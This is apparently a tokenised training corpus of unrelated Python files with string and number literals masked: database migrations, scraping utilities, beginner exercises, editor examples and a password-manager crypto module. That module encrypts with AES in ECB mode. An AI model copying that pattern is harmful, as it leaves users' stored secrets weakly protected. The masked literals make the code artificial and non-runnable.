<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) ) <EOL> def downgrade ( ) : <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from normality import slugify <EOL> class TabularColumn ( object ) : <EOL> def __init__ ( self , schema , data ) : <EOL> self . schema = schema <EOL> self . data = data <EOL> self . label = data . get ( '<STR_LIT:label>' ) <EOL> self . name = data . get ( '<STR_LIT:name>' ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . label , self . name ) <EOL> class Tabular ( object ) : <EOL> def __init__ ( self , schema = None ) : <EOL> self . schema = schema or { } <EOL> if '<STR_LIT>' not in self . schema : <EOL> self . schema [ '<STR_LIT>' ] = [ ] <EOL> def add_column ( self , label ) : <EOL> label = unicode ( label ) <EOL> column = slugify ( label or '<STR_LIT>' , sep = '<STR_LIT:_>' ) <EOL> column = column or '<STR_LIT>' <EOL> column = column [ : <NUM_LIT> ] <EOL> name , i = column , <NUM_LIT:2> <EOL> while name in [ c . name for c in self . columns ] : <EOL> name = '<STR_LIT>' % ( name , i ) <EOL> i += <NUM_LIT:1> <EOL> column = { '<STR_LIT:label>' : label , '<STR_LIT:name>' : column } <EOL> self . schema [ '<STR_LIT>' ] . append ( column ) <EOL> return TabularColumn ( self , column ) <EOL> @ property <EOL> def sheet ( self ) : <EOL> return self . schema . get ( '<STR_LIT>' ) <EOL> @ property <EOL> def sheet_name ( self ) : <EOL> name = self . schema . get ( '<STR_LIT>' ) <EOL> if name is not None : <EOL> return name <EOL> return '<STR_LIT>' % self . sheet <EOL> @ property <EOL> def columns ( self ) : <EOL> for col in self . schema [ '<STR_LIT>' ] : <EOL> yield TabularColumn ( self , col ) <EOL> def to_dict ( self ) : <EOL> data = self . schema <EOL> data [ '<STR_LIT>' ] = self . sheet <EOL> data [ '<STR_LIT>' ] = self . sheet_name <EOL> return data <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % list ( self . columns ) </s>
<s> import os <EOL> import re <EOL> import gc <EOL> import six <EOL> import logging <EOL> import unicodedata <EOL> from hashlib import sha1 <EOL> from datetime import datetime , date <EOL> from unidecode import unidecode <EOL> from normality import slugify <EOL> log = logging . getLogger ( __name__ ) <EOL> COLLAPSE = re . compile ( r'<STR_LIT>' ) <EOL> WS = '<STR_LIT:U+0020>' <EOL> CATEGORIES = { <EOL> '<STR_LIT:C>' : '<STR_LIT>' , <EOL> '<STR_LIT:M>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : WS , <EOL> '<STR_LIT:P>' : '<STR_LIT>' , <EOL> '<STR_LIT:S>' : WS <EOL> } <EOL> def checksum ( filename ) : <EOL> """<STR_LIT>""" <EOL> hash = sha1 ( ) <EOL> with open ( filename , '<STR_LIT:rb>' ) as fh : <EOL> while True : <EOL> block = fh . read ( <NUM_LIT:2> ** <NUM_LIT:10> ) <EOL> if not block : <EOL> break <EOL> hash . update ( block ) <EOL> return hash . hexdigest ( ) <EOL> def make_filename ( source , sep = '<STR_LIT:->' ) : <EOL> if source is not None : <EOL> source = os . path . basename ( source ) <EOL> slugs = [ slugify ( s , sep = sep ) for s in source . split ( '<STR_LIT:.>' ) ] <EOL> source = '<STR_LIT:.>' . join ( slugs ) <EOL> source = source . strip ( '<STR_LIT:.>' ) . strip ( sep ) <EOL> return source <EOL> def latinize_text ( text ) : <EOL> if not isinstance ( text , six . text_type ) : <EOL> return text <EOL> text = unicode ( unidecode ( text ) ) <EOL> text = text . replace ( '<STR_LIT:@>' , '<STR_LIT:a>' ) <EOL> return text . lower ( ) <EOL> def normalize_strong ( text ) : <EOL> if not isinstance ( text , six . string_types ) : <EOL> return <EOL> if six . PY2 and not isinstance ( text , six . text_type ) : <EOL> text = text . decode ( '<STR_LIT:utf-8>' ) <EOL> text = latinize_text ( text . lower ( ) ) <EOL> text = unicodedata . normalize ( '<STR_LIT>' , text ) <EOL> characters = [ ] <EOL> for character in text : <EOL> category = unicodedata . category ( character ) [ <NUM_LIT:0> ] <EOL> character = CATEGORIES . get ( category , character ) <EOL> characters . 
append ( character ) <EOL> text = u'<STR_LIT>' . join ( characters ) <EOL> return COLLAPSE . sub ( WS , text ) . strip ( WS ) <EOL> def string_value ( value , encoding = None ) : <EOL> if encoding is None : <EOL> encoding = '<STR_LIT:utf-8>' <EOL> try : <EOL> if value is None : <EOL> return <EOL> if isinstance ( value , ( date , datetime ) ) : <EOL> return value . isoformat ( ) <EOL> elif isinstance ( value , float ) and not value . is_integer ( ) : <EOL> return unicode ( value ) <EOL> elif isinstance ( value , six . string_types ) : <EOL> if not isinstance ( value , six . text_type ) : <EOL> value = value . decode ( encoding ) <EOL> if not len ( value . strip ( ) ) : <EOL> return <EOL> else : <EOL> value = unicode ( value ) <EOL> return value <EOL> except Exception as ex : <EOL> log . exception ( ex ) <EOL> return <EOL> def find_subclasses ( cls ) : <EOL> all_refs = gc . get_referrers ( cls ) <EOL> results = [ ] <EOL> for o in all_refs : <EOL> if ( isinstance ( o , tuple ) and getattr ( o [ <NUM_LIT:0> ] , "<STR_LIT>" , None ) is o ) : <EOL> results . append ( o [ <NUM_LIT:0> ] ) <EOL> return results </s>
<s> from archivekit . resource import Resource <EOL> class Source ( Resource ) : <EOL> """<STR_LIT>""" <EOL> GROUP = '<STR_LIT:source>' <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . name </s>
<s> from datetime import datetime <EOL> try : <EOL> from urlparse import urlparse <EOL> except ImportError : <EOL> from urllib . parse import urlparse <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordereddict import OrderedDict <EOL> from sqlalchemy import Integer , UnicodeText , Float , DateTime , Boolean <EOL> from six import string_types <EOL> row_type = OrderedDict <EOL> def guess_type ( sample ) : <EOL> if isinstance ( sample , bool ) : <EOL> return Boolean <EOL> elif isinstance ( sample , int ) : <EOL> return Integer <EOL> elif isinstance ( sample , float ) : <EOL> return Float <EOL> elif isinstance ( sample , datetime ) : <EOL> return DateTime <EOL> return UnicodeText <EOL> def convert_row ( row_type , row ) : <EOL> if row is None : <EOL> return None <EOL> return row_type ( row . items ( ) ) <EOL> def normalize_column_name ( name ) : <EOL> if not isinstance ( name , string_types ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> name = name . lower ( ) . strip ( ) <EOL> if not len ( name ) or '<STR_LIT:.>' in name or '<STR_LIT:->' in name : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> return name <EOL> class ResultIter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , result_proxy , row_type = row_type , step = None ) : <EOL> self . result_proxy = result_proxy <EOL> self . row_type = row_type <EOL> self . step = step <EOL> self . keys = list ( result_proxy . keys ( ) ) <EOL> self . _iter = None <EOL> def _next_chunk ( self ) : <EOL> if self . result_proxy . closed : <EOL> return False <EOL> if not self . step : <EOL> chunk = self . result_proxy . fetchall ( ) <EOL> else : <EOL> chunk = self . result_proxy . fetchmany ( self . step ) <EOL> if chunk : <EOL> self . _iter = iter ( chunk ) <EOL> return True <EOL> else : <EOL> return False <EOL> def __next__ ( self ) : <EOL> if self . _iter is None : <EOL> if not self . 
_next_chunk ( ) : <EOL> raise StopIteration <EOL> try : <EOL> return convert_row ( self . row_type , next ( self . _iter ) ) <EOL> except StopIteration : <EOL> self . _iter = None <EOL> return self . __next__ ( ) <EOL> next = __next__ <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def safe_url ( url ) : <EOL> """<STR_LIT>""" <EOL> parsed = urlparse ( url ) <EOL> if parsed . password is not None : <EOL> pwd = '<STR_LIT>' % parsed . password <EOL> url = url . replace ( pwd , '<STR_LIT>' ) <EOL> return url </s>
<s> import json <EOL> import logging <EOL> from datetime import datetime <EOL> from pepparser . util import make_id <EOL> from pepparser . country import normalize_country <EOL> log = logging . getLogger ( __name__ ) <EOL> PUBLISHER = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def parse_ts ( ts ) : <EOL> return datetime . fromtimestamp ( int ( ts ) ) . date ( ) . isoformat ( ) <EOL> def everypolitician_parse ( emit , json_file ) : <EOL> with open ( json_file , '<STR_LIT:r>' ) as fh : <EOL> data = json . load ( fh ) <EOL> for policitian in data . get ( '<STR_LIT>' ) : <EOL> country = normalize_country ( policitian . get ( '<STR_LIT>' ) ) <EOL> entity = { <EOL> '<STR_LIT>' : make_id ( '<STR_LIT>' , policitian . get ( '<STR_LIT:id>' ) . split ( '<STR_LIT:->' ) [ - <NUM_LIT:1> ] ) , <EOL> '<STR_LIT:name>' : policitian . get ( '<STR_LIT:name>' ) , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : country } ] , <EOL> '<STR_LIT>' : parse_ts ( policitian . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : policitian . get ( '<STR_LIT>' ) <EOL> } <EOL> entity . update ( PUBLISHER ) <EOL> emit . entity ( entity ) </s>
<s> """<STR_LIT>""" <EOL> from uuid import uuid4 <EOL> from time import sleep <EOL> try : <EOL> from queue import Queue <EOL> except ImportError : <EOL> from Queue import Queue <EOL> from threading import Thread <EOL> class TaskManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , threads = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> self . num_threads = int ( threads ) <EOL> self . queue = None <EOL> def _spawn ( self ) : <EOL> """<STR_LIT>""" <EOL> self . queue = Queue ( maxsize = self . num_threads * <NUM_LIT:10> ) <EOL> for i in range ( self . num_threads ) : <EOL> t = Thread ( target = self . _consume ) <EOL> t . daemon = True <EOL> t . start ( ) <EOL> def _consume ( self ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> try : <EOL> task , args , kwargs = self . queue . get ( True ) <EOL> task ( * args , ** kwargs ) <EOL> finally : <EOL> self . queue . task_done ( ) <EOL> def put ( self , task , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . num_threads == <NUM_LIT:0> : <EOL> return task ( * args , ** kwargs ) <EOL> if self . queue is None : <EOL> self . _spawn ( ) <EOL> self . queue . put ( ( task , args , kwargs ) ) <EOL> def wait ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . queue is None : <EOL> return <EOL> self . queue . join ( ) <EOL> class ChainListener ( object ) : <EOL> def __init__ ( self , task ) : <EOL> self . task = task <EOL> def notify ( self , value ) : <EOL> self . task . queue ( value ) <EOL> class PipeListener ( ChainListener ) : <EOL> def notify ( self , value ) : <EOL> for value_item in value : <EOL> self . task . queue ( value_item ) <EOL> class Task ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scraper , fn , task_id = None ) : <EOL> self . scraper = scraper <EOL> self . fn = fn <EOL> self . task_id = task_id <EOL> self . _listeners = [ ] <EOL> self . _source = None <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . scraper . task_ctx . 
name = getattr ( self . fn , '<STR_LIT>' , self . fn . __name__ ) <EOL> self . scraper . task_ctx . id = self . task_id or uuid4 ( ) <EOL> try : <EOL> self . scraper . log . debug ( '<STR_LIT>' , extra = { <EOL> '<STR_LIT>' : args , <EOL> '<STR_LIT>' : kwargs <EOL> } ) <EOL> value = self . fn ( * args , ** kwargs ) <EOL> for listener in self . _listeners : <EOL> listener . notify ( value ) <EOL> return value <EOL> except Exception as e : <EOL> self . scraper . log . exception ( e ) <EOL> finally : <EOL> self . scraper . task_ctx . name = None <EOL> self . scraper . task_ctx . id = None <EOL> def queue ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . scraper . task_manager . put ( self , args , kwargs ) <EOL> return self <EOL> def wait ( self ) : <EOL> """<STR_LIT>""" <EOL> self . scraper . task_manager . wait ( ) <EOL> return self <EOL> def run ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . _source is not None : <EOL> return self . _source . run ( * args , ** kwargs ) <EOL> else : <EOL> self . queue ( * args , ** kwargs ) <EOL> return self . wait ( ) <EOL> def chain ( self , other_task ) : <EOL> """<STR_LIT>""" <EOL> other_task . _source = self <EOL> self . _listeners . append ( ChainListener ( other_task ) ) <EOL> return other_task <EOL> def pipe ( self , other_task ) : <EOL> """<STR_LIT>""" <EOL> other_task . _source = self <EOL> self . _listeners . append ( PipeListener ( other_task ) ) <EOL> return other_task <EOL> def __gt__ ( self , other_task ) : <EOL> return self . chain ( other_task ) <EOL> def __or__ ( self , other_task ) : <EOL> return self . pipe ( other_task ) </s>
<s> from __future__ import absolute_import , print_function <EOL> import os <EOL> import shutil <EOL> import sys <EOL> import tempfile <EOL> import tarfile <EOL> if sys . version_info . major > <NUM_LIT:2> : <EOL> from urllib . request import urlretrieve <EOL> else : <EOL> from urllib import urlretrieve <EOL> ARCHIVE_URL = '<STR_LIT>' <EOL> def copy_indexes ( archive ) : <EOL> extract_dir = os . path . dirname ( archive ) <EOL> src_dir = os . path . join ( extract_dir , '<STR_LIT>' ) <EOL> dst_dir = os . path . expanduser ( '<STR_LIT>' ) <EOL> with tarfile . open ( archive , '<STR_LIT>' ) as tf : <EOL> tf . extractall ( extract_dir ) <EOL> if not os . path . exists ( dst_dir ) : <EOL> os . makedirs ( dst_dir ) <EOL> for name in os . listdir ( src_dir ) : <EOL> if name . endswith ( '<STR_LIT>' ) : <EOL> src = os . path . join ( src_dir , name ) <EOL> dst = os . path . join ( dst_dir , name ) <EOL> copy = True <EOL> if os . path . exists ( dst ) : <EOL> copy = _prompt_overwrite ( dst ) <EOL> if copy : <EOL> shutil . copy ( src , dst ) <EOL> def download_cinspect_data_archive ( url = None ) : <EOL> if url is None : <EOL> url = ARCHIVE_URL <EOL> t = tempfile . mkdtemp ( ) <EOL> print ( '<STR_LIT>' , t ) <EOL> filename = os . path . join ( t , '<STR_LIT>' ) <EOL> reporthook = lambda x , y , z : _spin ( <NUM_LIT:5> ) <EOL> urlretrieve ( url , filename , reporthook ) <EOL> print ( '<STR_LIT>' , filename ) <EOL> return filename <EOL> def _prompt_overwrite ( path ) : <EOL> if sys . version_info . major > <NUM_LIT:2> : <EOL> ask = input <EOL> else : <EOL> ask = raw_input <EOL> answer = ask ( '<STR_LIT>' % path ) <EOL> return True if answer . strip ( ) . 
lower ( ) [ : <NUM_LIT:1> ] == '<STR_LIT:y>' else False <EOL> def _spin ( every , state = [ '<STR_LIT:|>' , <NUM_LIT:0> ] ) : <EOL> if state [ <NUM_LIT:1> ] >= every : <EOL> state [ <NUM_LIT:1> ] = <NUM_LIT:0> <EOL> if state [ <NUM_LIT:1> ] == <NUM_LIT:0> : <EOL> sigils = '<STR_LIT>' <EOL> state [ <NUM_LIT:0> ] = sigils [ ( sigils . index ( state [ <NUM_LIT:0> ] ) + <NUM_LIT:1> ) % <NUM_LIT:4> ] <EOL> sys . stderr . write ( '<STR_LIT:\r>' + state [ <NUM_LIT:0> ] ) <EOL> sys . stderr . flush ( ) <EOL> state [ <NUM_LIT:1> ] += <NUM_LIT:1> <EOL> def main ( ) : <EOL> copy_indexes ( download_cinspect_data_archive ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> class PusherError ( Exception ) : <EOL> pass <EOL> class PusherBadRequest ( PusherError ) : <EOL> pass <EOL> class PusherBadAuth ( PusherError ) : <EOL> pass <EOL> class PusherForbidden ( PusherError ) : <EOL> pass <EOL> class PusherBadStatus ( PusherError ) : <EOL> pass </s>
<s> import logging <EOL> logging . basicConfig ( ) <EOL> from pvlib . version import __version__ <EOL> from pvlib import tools <EOL> from pvlib import atmosphere <EOL> from pvlib import clearsky <EOL> from pvlib import irradiance <EOL> from pvlib import location <EOL> from pvlib import solarposition <EOL> from pvlib import tmy <EOL> from pvlib import tracking <EOL> from pvlib import pvsystem <EOL> from pvlib import spa <EOL> from pvlib import modelchain </s>
<s> cars = <NUM_LIT:100> <EOL> space_in_a_car = <NUM_LIT> <EOL> drivers = <NUM_LIT:30> <EOL> passengers = <NUM_LIT> <EOL> cars_not_driven = cars - drivers <EOL> cars_driven = drivers <EOL> carpool_capacity = cars_driven * space_in_a_car <EOL> average_passengers_per_car = passengers / cars_driven <EOL> print "<STR_LIT>" , cars , "<STR_LIT>" <EOL> print "<STR_LIT>" , drivers , "<STR_LIT>" <EOL> print "<STR_LIT>" , cars_not_driven , "<STR_LIT>" <EOL> print "<STR_LIT>" , carpool_capacity , "<STR_LIT>" <EOL> print "<STR_LIT>" , passengers , "<STR_LIT>" <EOL> print "<STR_LIT>" , average_passengers_per_car , "<STR_LIT>" </s>
<s> print "<STR_LIT>" <EOL> door = raw_input ( "<STR_LIT>" ) <EOL> if door == "<STR_LIT:1>" : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> bear = raw_input ( "<STR_LIT>" ) <EOL> if bear == "<STR_LIT:1>" : <EOL> print "<STR_LIT>" <EOL> elif bear == "<STR_LIT:2>" : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" % bear <EOL> elif door == "<STR_LIT:2>" : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> insanity = raw_input ( "<STR_LIT>" ) <EOL> if insanity == "<STR_LIT:1>" or insanity == "<STR_LIT:2>" : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" </s>
<s> from nose . tools import * <EOL> from exercise48 . parser import * <EOL> def test_parse_sentence ( ) : <EOL> sentence = parse_sentence ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> assert_equal ( sentence . subject , '<STR_LIT>' ) <EOL> assert_equal ( sentence . verb , '<STR_LIT>' ) <EOL> assert_equal ( sentence . object , '<STR_LIT>' ) </s>
<s> from __future__ import print_function <EOL> import base64 <EOL> import ctypes <EOL> import string <EOL> import os <EOL> import sys <EOL> import binascii <EOL> import time <EOL> import random <EOL> from Crypto . Cipher import AES <EOL> from Crypto . Protocol . KDF import PBKDF2 <EOL> from pwman . util . callback import Callback <EOL> if sys . version_info . major > <NUM_LIT:2> : <EOL> raw_input = input <EOL> EncodeAES = lambda c , s : base64 . b64encode ( c . encrypt ( s ) ) <EOL> DecodeAES = lambda c , e : c . decrypt ( base64 . b64decode ( e ) ) . rstrip ( ) <EOL> def generate_password ( pass_len = <NUM_LIT:8> , uppercase = True , lowercase = True , digits = True , <EOL> special_chars = True ) : <EOL> allowed = '<STR_LIT>' <EOL> if lowercase : <EOL> allowed = allowed + string . ascii_lowercase <EOL> if uppercase : <EOL> allowed = allowed + string . ascii_uppercase <EOL> if digits : <EOL> allowed = allowed + string . digits <EOL> if special_chars : <EOL> allowed = allowed + string . punctuation <EOL> password = '<STR_LIT>' . join ( random . SystemRandom ( ) . choice ( allowed ) <EOL> for _ in range ( pass_len ) ) <EOL> return password <EOL> def zerome ( string ) : <EOL> """<STR_LIT>""" <EOL> bufsize = len ( string ) + <NUM_LIT:1> <EOL> offset = sys . getsizeof ( string ) - bufsize <EOL> ctypes . memset ( id ( string ) + offset , <NUM_LIT:0> , bufsize ) <EOL> class CryptoException ( Exception ) : <EOL> pass <EOL> def get_digest ( password , salt ) : <EOL> """<STR_LIT>""" <EOL> iterations = <NUM_LIT> <EOL> if isinstance ( password , bytes ) : <EOL> password = password . decode ( ) <EOL> return PBKDF2 ( password , salt , dkLen = <NUM_LIT:32> , count = iterations ) <EOL> def get_cipher ( password , salt ) : <EOL> """<STR_LIT>""" <EOL> iv = os . urandom ( AES . block_size ) <EOL> dig = get_digest ( password , salt ) <EOL> chiper = AES . new ( dig , AES . 
MODE_ECB , iv ) <EOL> return chiper <EOL> def prepare_data ( text , block_size ) : <EOL> """<STR_LIT>""" <EOL> num_blocks = len ( text ) // block_size + <NUM_LIT:1> <EOL> newdatasize = block_size * num_blocks <EOL> return text . ljust ( newdatasize ) <EOL> class CryptoEngine ( object ) : <EOL> _timeoutcount = <NUM_LIT:0> <EOL> _instance = None <EOL> _callback = None <EOL> @ classmethod <EOL> def get ( cls , timeout = - <NUM_LIT:1> ) : <EOL> if CryptoEngine . _instance : <EOL> return CryptoEngine . _instance <EOL> CryptoEngine . _instance = CryptoEngine ( timeout ) <EOL> return CryptoEngine . _instance <EOL> def __init__ ( self , salt = None , digest = None , algorithm = '<STR_LIT>' , <EOL> timeout = - <NUM_LIT:1> , reader = None ) : <EOL> """<STR_LIT>""" <EOL> self . _algo = algorithm <EOL> self . _digest = digest if digest else None <EOL> self . _salt = salt if salt else None <EOL> self . _timeout = timeout <EOL> self . _cipher = None <EOL> self . _reader = reader <EOL> self . _callback = None <EOL> self . _getsecret = None <EOL> def authenticate ( self , password ) : <EOL> """<STR_LIT>""" <EOL> dig = get_digest ( password , self . _salt ) <EOL> if binascii . hexlify ( dig ) == self . _digest or dig == self . _digest : <EOL> CryptoEngine . _timeoutcount = time . time ( ) <EOL> self . _cipher = get_cipher ( password , self . _salt ) <EOL> return True <EOL> return False <EOL> def _auth ( self ) : <EOL> """<STR_LIT>""" <EOL> salt = self . _salt <EOL> tries = <NUM_LIT:0> <EOL> while tries < <NUM_LIT:5> : <EOL> password = self . _getsecret ( "<STR_LIT>" <EOL> ) . encode ( '<STR_LIT:utf-8>' ) <EOL> if self . authenticate ( password ) : <EOL> return password , salt <EOL> print ( "<STR_LIT>" ) <EOL> tries += <NUM_LIT:1> <EOL> raise CryptoException ( "<STR_LIT>" ) <EOL> def encrypt ( self , text ) : <EOL> if not self . _is_authenticated ( ) : <EOL> p , s = self . _auth ( ) <EOL> cipher = get_cipher ( p , s ) <EOL> self . 
_cipher = cipher <EOL> del ( p ) <EOL> return EncodeAES ( self . _cipher , prepare_data ( text , AES . block_size ) ) <EOL> def decrypt ( self , cipher_text ) : <EOL> if not self . _is_authenticated ( ) : <EOL> p , s = self . _auth ( ) <EOL> cipher = get_cipher ( p , s ) <EOL> self . _cipher = cipher <EOL> del ( p ) <EOL> return DecodeAES ( self . _cipher , prepare_data ( cipher_text , <EOL> AES . block_size ) ) <EOL> def forget ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _cipher = None <EOL> def _is_authenticated ( self ) : <EOL> if not self . _digest and not self . _salt : <EOL> self . _create_password ( ) <EOL> if not self . _is_timedout ( ) and self . _cipher is not None : <EOL> return True <EOL> return False <EOL> def _is_timedout ( self ) : <EOL> if self . _timeout > <NUM_LIT:0> : <EOL> if ( time . time ( ) - CryptoEngine . _timeoutcount ) > self . _timeout : <EOL> self . _cipher = None <EOL> return True <EOL> return False <EOL> def changepassword ( self , reader = raw_input ) : <EOL> if self . _callback is None : <EOL> raise CryptoException ( "<STR_LIT>" ) <EOL> self . _keycrypted = self . _create_password ( ) <EOL> self . set_cryptedkey ( self . _keycrypted ) <EOL> return self . _keycrypted <EOL> @ property <EOL> def callback ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _callback <EOL> @ callback . setter <EOL> def callback ( self , callback ) : <EOL> if isinstance ( callback , Callback ) : <EOL> self . _callback = callback <EOL> self . _getsecret = callback . getsecret <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def _create_password ( self ) : <EOL> """<STR_LIT>""" <EOL> salt = base64 . b64encode ( os . urandom ( <NUM_LIT:32> ) ) <EOL> passwd = self . _getsecret ( "<STR_LIT>" ) <EOL> key = get_digest ( passwd , salt ) <EOL> hpk = salt + '<STR_LIT>' . encode ( '<STR_LIT:utf8>' ) + binascii . hexlify ( key ) <EOL> self . _digest = key <EOL> self . _salt = salt <EOL> self . _cipher = get_cipher ( passwd , salt ) <EOL> return hpk . 
decode ( '<STR_LIT:utf-8>' ) <EOL> def set_cryptedkey ( self , key ) : <EOL> salt , digest = key . split ( '<STR_LIT>' ) <EOL> self . _digest = digest . encode ( '<STR_LIT:utf-8>' ) <EOL> self . _salt = salt . encode ( '<STR_LIT:utf-8>' ) <EOL> def get_cryptedkey ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _salt . decode ( ) + u'<STR_LIT>' + self . _digest . decode ( ) </s>
<s> """<STR_LIT>""" <EOL> from . parser import Parser <EOL> from . request import HTTPRequest <EOL> from . response import HTTPResponse <EOL> from . protocol import GrowlerHTTPProtocol <EOL> from . errors import __all__ as http_errors <EOL> from . status import Status <EOL> from . methods import HTTPMethod <EOL> from http . server import BaseHTTPRequestHandler <EOL> import mimetypes <EOL> mimetypes . init ( ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> __all__ . extend ( http_errors ) <EOL> MAX_REQUEST_LENGTH = <NUM_LIT:4> * ( <NUM_LIT:2> ** <NUM_LIT:10> ) <EOL> MAX_POST_LENGTH = <NUM_LIT:2> * ( <NUM_LIT:2> ** <NUM_LIT:20> ) <EOL> RESPONSES = BaseHTTPRequestHandler . responses <EOL> HttpStatusPhrase = Status . Phrase </s>
<s> import sys <EOL> import pytest <EOL> from unittest import mock <EOL> @ pytest . fixture <EOL> def mock_importer ( ) : <EOL> import growler . ext <EOL> return mock . create_autospec ( growler . ext ) <EOL> def test_module ( ) : <EOL> import growler . ext <EOL> assert growler . ext . __name__ == '<STR_LIT>' <EOL> def test_load_module ( ) : <EOL> mod = mock . Mock ( ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> from growler . ext import xxxx <EOL> assert xxxx is mod <EOL> def test_load_module_cached ( ) : <EOL> import growler . ext <EOL> mod = mock . Mock ( ) <EOL> growler . ext . __mods__ = mock . MagicMock ( ) <EOL> growler . ext . __mods__ . __contains__ . return_value = True <EOL> growler . ext . mod_is_cached <EOL> assert growler . ext . __mods__ . __getitem__ . called <EOL> growler . ext . __mods__ . __contains__ . assert_called_with ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> import sys <EOL> from pyqode . qt import QtWidgets <EOL> from pyqode . core . api import CodeEdit <EOL> from pyqode . core . backend import server <EOL> from pyqode . core . modes import CaseConverterMode <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app = QtWidgets . QApplication ( sys . argv ) <EOL> editor = CodeEdit ( ) <EOL> editor . backend . start ( server . __file__ ) <EOL> editor . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> print ( editor . modes . append ( CaseConverterMode ( ) ) ) <EOL> editor . show ( ) <EOL> editor . setPlainText ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> editor . selectAll ( ) <EOL> app . exec_ ( ) <EOL> editor . close ( ) <EOL> del editor <EOL> del app </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> import sys <EOL> from pyqode . qt import QtWidgets <EOL> from pyqode . core . api import CodeEdit <EOL> from pyqode . core . backend import server <EOL> from pyqode . core . panels import SearchAndReplacePanel <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app = QtWidgets . QApplication ( sys . argv ) <EOL> editor = CodeEdit ( ) <EOL> editor . backend . start ( server . __file__ ) <EOL> editor . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> editor . panels . append ( SearchAndReplacePanel ( ) , <EOL> SearchAndReplacePanel . Position . TOP ) <EOL> editor . setPlainText ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> editor . show ( ) <EOL> app . exec_ ( ) <EOL> editor . close ( ) <EOL> del editor <EOL> del app </s>
<s> """<STR_LIT>""" <EOL> from . code_edit import CodeEdit <EOL> from . decoration import TextDecoration <EOL> from . encodings import ENCODINGS_MAP , convert_to_codec_key <EOL> from . manager import Manager <EOL> from . mode import Mode <EOL> from . panel import Panel <EOL> from . syntax_highlighter import ColorScheme <EOL> from . syntax_highlighter import PYGMENTS_STYLES <EOL> from . syntax_highlighter import SyntaxHighlighter <EOL> from . syntax_highlighter import TextBlockUserData <EOL> from . utils import TextHelper , TextBlockHelper <EOL> from . utils import get_block_symbol_data <EOL> from . utils import DelayJobRunner <EOL> from . folding import FoldDetector <EOL> from . folding import IndentFoldDetector <EOL> from . folding import CharBasedFoldDetector <EOL> from . folding import FoldScope <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , 